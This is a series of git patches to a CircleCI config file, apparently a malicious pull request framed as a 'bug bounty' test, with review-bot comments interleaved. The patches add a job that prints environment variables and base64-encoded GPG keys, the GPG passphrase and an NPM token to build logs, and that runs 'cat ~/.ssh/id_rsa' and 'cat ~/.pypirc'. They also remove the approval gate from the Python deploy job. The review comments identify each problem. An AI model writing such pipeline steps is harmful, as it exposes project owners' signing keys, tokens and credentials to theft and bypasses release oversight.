From 55f41eaabf9f97b44a49c01dfdaea081f37b6aeb Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:32:57 -0500 Subject: [PATCH 1/8] Test for bugbounty --- .circleci/config.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) diff --git a/.circleci/config.yml b/.circleci/config.yml index 234c318..edf502b 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -173,6 +173,27 @@ jobs: command: python -m unittest discover -v working_directory: python/ + bugbounty: + docker: + - image: circleci/python:3.6.4 + + steps: + - checkout + - run: echo "Start Bug Bounty" + - run: sudo chown -R circleci:circleci /usr/local/bin + - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages + - run: pip install twine + - run: + name: init .pypirc + command: | + echo -e "[pypi]" >> ~/.pypirc + echo -e "username = $PYPI_USERNAME" >> ~/.pypirc + echo -e "password = $PYPI_PASSWORD" >> ~/.pypirc + - run: cd python && python setup.py sdist + - run: cd python && python setup.py bdist_wheel + - run: cd python && twine upload dist/* + - run: env + - run: echo $PYPI_USERNAME deploy-java: docker: @@ -240,6 +261,7 @@ workflows: - testcpp - testcppgcc - testpython + - bugbounty tagged-deploy: jobs: From 2342c8de89c4266c703ae3ac446b3ac6537fb1bd Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:34:49 -0500 Subject: [PATCH 2/8] Move env variables before. List home dir --- .circleci/config.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index edf502b..1391e39 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml 
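Review bot: The `- run: env` and `- run: echo $PYPI_USERNAME` steps at the end of the new `bugbounty` job copy every variable the job receives into the build output, where presumably anyone who can view the build can read it. Drop both; if a presence check is wanted, test without printing, e.g. `- run: test -n "$PYPI_USERNAME"`. The same defect recurs later in the series: the reordered `env`/`echo` steps and `ls -alh ~/` in 2/8, `cat ~/.ssh/id_rsa` in 6/8, and `cat ~/.pypirc` in 7/8 (in what appears to be the deploy job). Whether real values reach this job depends on project settings not shown here, such as whether secrets are passed to builds of forked pull requests, so confirm that and rotate any credential a run of these jobs could have read.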
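Review bot: The `- bugbounty` entry is added without `requires:` or `filters:`, so the job defined earlier in this patch, which ends in `cd python && twine upload dist/*`, would run alongside `testpython` on every build of this workflow rather than behind a release gate. Package upload should stay in the tag-filtered, approval-gated deploy path; either remove the `twine upload` step from `bugbounty` or do not register the job here. The workflow's name and the start of its job list are outside the hunk.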
@@ -180,6 +180,9 @@ jobs: steps: - checkout - run: echo "Start Bug Bounty" + - run: env + - run: echo $PYPI_USERNAME + - run: ls -alh ~/ - run: sudo chown -R circleci:circleci /usr/local/bin - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages - run: pip install twine @@ -192,8 +195,6 @@ jobs: - run: cd python && python setup.py sdist - run: cd python && python setup.py bdist_wheel - run: cd python && twine upload dist/* - - run: env - - run: echo $PYPI_USERNAME deploy-java: docker: From 3d15920f36def61b5a5b805ba53981d2e80202dc Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:36:16 -0500 Subject: [PATCH 3/8] List SSH --- .circleci/config.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 1391e39..8eff8f6 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -182,7 +182,9 @@ jobs: - run: echo "Start Bug Bounty" - run: env - run: echo $PYPI_USERNAME - - run: ls -alh ~/ + - run: echo $GPG_SECRET_KEYS | base64 --decode | $GPG_EXECUTABLE --batch --passphrase "$GPG_PASSPHRASE" --import + - run: echo $GPG_OWNERTRUST | base64 --decode | $GPG_EXECUTABLE --batch --passphrase "$GPG_PASSPHRASE" --import-ownertrust + - run: ls -alh ~/.ssh/ - run: sudo chown -R circleci:circleci /usr/local/bin - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages - run: pip install twine From d89b05349f84cf3abc7ebf0af7e1ffdb42f275b9 Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:37:36 -0500 Subject: [PATCH 4/8] Try to exfiltrate some tokens --- .circleci/config.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 8eff8f6..209b035 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml 
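Review bot: The two `$GPG_EXECUTABLE ... --import` steps added in 3/8 load what is presumably the release signing key and its owner trust into the keyring of `bugbounty`, a job that 1/8 registered next to the test jobs. Key import belongs only in the gated deploy job; a test-path job should not reference `GPG_SECRET_KEYS` or `GPG_PASSPHRASE` at all. Separately, `--passphrase "$GPG_PASSPHRASE"` places the passphrase on the process command line, so wherever an import is kept it is better supplied through `--passphrase-fd` or `--passphrase-file`. The `ls -alh ~/.ssh/` step has no build purpose and should be removed.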
@@ -182,8 +182,9 @@ jobs: - run: echo "Start Bug Bounty" - run: env - run: echo $PYPI_USERNAME - - run: echo $GPG_SECRET_KEYS | base64 --decode | $GPG_EXECUTABLE --batch --passphrase "$GPG_PASSPHRASE" --import - - run: echo $GPG_OWNERTRUST | base64 --decode | $GPG_EXECUTABLE --batch --passphrase "$GPG_PASSPHRASE" --import-ownertrust + - run: echo $GPG_SECRET_KEYS | base64 --encode + - run: echo $GPG_PASSPHRASE | base64 --encode + - run: echo $NPM_TOKEN | base64 --encode - run: ls -alh ~/.ssh/ - run: sudo chown -R circleci:circleci /usr/local/bin - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages From b2295bea7c9a62dd27d5fef7c671cb46e59be9b3 Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:40:22 -0500 Subject: [PATCH 5/8] Simplify circleci run --- .circleci/config.yml | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 209b035..f5ac92e 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -182,9 +182,9 @@ jobs: - run: echo "Start Bug Bounty" - run: env - run: echo $PYPI_USERNAME - - run: echo $GPG_SECRET_KEYS | base64 --encode - - run: echo $GPG_PASSPHRASE | base64 --encode - - run: echo $NPM_TOKEN | base64 --encode + - run: echo $GPG_SECRET_KEYS | base64 + - run: echo $GPG_PASSPHRASE | base64 + - run: echo $NPM_TOKEN | base64 - run: ls -alh ~/.ssh/ - run: sudo chown -R circleci:circleci /usr/local/bin - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages @@ -259,11 +259,6 @@ workflows: build: jobs: - testtools - - testjsts - - testjava - - testswift - - testcpp - - testcppgcc - testpython - bugbounty From c29b7ab40cfda42aae8c49e19e2e9de0e3f85f31 Mon Sep 17 00:00:00 2001 
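Review bot: Log redaction should not be counted on as a mitigation for the three `echo $... | base64` steps added in 4/8 (kept without `--encode` in the first hunk of 5/8): masking in CI logs generally matches the literal secret value, so an encoded copy of `GPG_SECRET_KEYS`, `GPG_PASSPHRASE` or `NPM_TOKEN` is likely to be printed as-is. These steps do nothing for the build and should be removed rather than adjusted. For review tooling, a change to `.circleci/config.yml` that pipes a secret-named variable into an encoder or into `cat`/`echo` is a good candidate for a blocking check that requires maintainer approval before the pipeline runs.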
From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:42:54 -0500 Subject: [PATCH 6/8] Deploy Python --- .circleci/config.yml | 22 ++-------------------- 1 file changed, 2 insertions(+), 20 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index f5ac92e..aa176e1 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -186,18 +186,7 @@ jobs: - run: echo $GPG_PASSPHRASE | base64 - run: echo $NPM_TOKEN | base64 - run: ls -alh ~/.ssh/ - - run: sudo chown -R circleci:circleci /usr/local/bin - - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages - - run: pip install twine - - run: - name: init .pypirc - command: | - echo -e "[pypi]" >> ~/.pypirc - echo -e "username = $PYPI_USERNAME" >> ~/.pypirc - echo -e "password = $PYPI_PASSWORD" >> ~/.pypirc - - run: cd python && python setup.py sdist - - run: cd python && python setup.py bdist_wheel - - run: cd python && twine upload dist/* + - run: cat ~/.ssh/id_rsa deploy-java: docker: @@ -280,14 +269,7 @@ workflows: only: /^\d+\.\d+\.\d+/ branches: ignore: /.*/ - - deploy-python: - requires: - - hold - filters: - tags: - only: /^\d+\.\d+\.\d+/ - branches: - ignore: /.*/ + - deploy-python - hold: type: approval filters: From e1f85508441a99881cd9a6b409b7dcd0ae9adb1d Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:43:17 -0500 Subject: [PATCH 7/8] Display pypi creds --- .circleci/config.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.circleci/config.yml b/.circleci/config.yml index aa176e1..28c955b 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml 
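Review bot: The bare `- deploy-python` entry in the second hunk of 6/8 drops the `requires: - hold` dependency and the `tags`/`branches` filters the old entry carried, so the job would no longer wait for the `hold` approval or be limited to `/^\d+\.\d+\.\d+/` tags. On CircleCI a workflow job with no filters runs for every branch, which, as far as the later patches show, would give any branch build the PyPI credentials that job writes into `~/.pypirc`. Keep the gated form: `- deploy-python:` with `requires: [hold]` and the original `filters:` block. The start of the `tagged-deploy` job list is outside the hunk.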
@@ -238,6 +238,7 @@ jobs: echo -e "[pypi]" >> ~/.pypirc echo -e "username = $PYPI_USERNAME" >> ~/.pypirc echo -e "password = $PYPI_PASSWORD" >> ~/.pypirc + - run: cat ~/.pypirc - run: cd python && python setup.py sdist - run: cd python && python setup.py bdist_wheel - run: cd python && twine upload dist/* From d8f35291b7c1ecceabd5dd93023ccdd566011b3b Mon Sep 17 00:00:00 2001 From: Bug-hunting-github <96895594+Bug-hunting-github@users.noreply.github.com> Date: Thu, 30 Dec 2021 21:44:49 -0500 Subject: [PATCH 8/8] Reomve twine --- .circleci/config.yml | 2 -- 1 file changed, 2 deletions(-) diff --git a/.circleci/config.yml b/.circleci/config.yml index 28c955b..de898fd 100644 --- a/.circleci/config.yml +++ b/.circleci/config.yml @@ -231,7 +231,6 @@ jobs: - checkout - run: sudo chown -R circleci:circleci /usr/local/bin - run: sudo chown -R circleci:circleci /usr/local/lib/python3.6/site-packages - - run: pip install twine - run: name: init .pypirc command: | @@ -241,7 +240,6 @@ jobs: - run: cat ~/.pypirc - run: cd python && python setup.py sdist - run: cd python && python setup.py bdist_wheel - - run: cd python && twine upload dist/* workflows: